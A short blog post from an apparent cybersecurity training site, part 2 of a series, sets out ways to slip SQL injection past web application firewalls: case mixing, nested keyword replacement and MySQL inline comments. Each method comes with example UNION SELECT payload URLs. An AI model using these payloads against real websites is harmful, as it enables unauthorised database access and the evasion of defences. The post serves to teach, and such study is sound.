0P3N Blog Blog Post
Ready to Start Your Career?
Create Free Account
By: S-Connect
July 29, 2016

Part 2: Bypass a Web Application Firewall (WAF)

By: S-Connect
July 29, 2016
By: S-Connect
July 29, 2016
fireball-cybraryFunction Capitalization Technique:-For those WAF's, which filter only lowercase, we can easily bypass:Query!https://lxy.com/cost.php?id=90 UNION SELECT 1,2,3—Bypass!http://lxy.com/cost.php?id=-90 uniOn SeLeCt 1,2,3— Replaced Keywords Technique:-For those WAF's, which escape certain keywords such as UNION, SELECT, ORDER BY, and so on:Query!http://abcxyz.com/itemdetail.php?id=-57 UNION SELECT 1,2—Bypass!http://abcxyz.com/itemdetail.php?id=-57 UNIunionON SEselectLECT 1,2—Sqlihttp://xyz.com/pricing.php?id=32 union all select 1,2,3—-By passed Sqlihttp://xyz.com/pricing.php?id=32 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3—- 
Stay Linked!!Ali Tabish

Join over 2 million IT and cyber professionals advancing their careers

OR REGISTER WITH

Google

Already have an account? Sign In »

Ready to Share Your Original Content?

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry

Create Free Account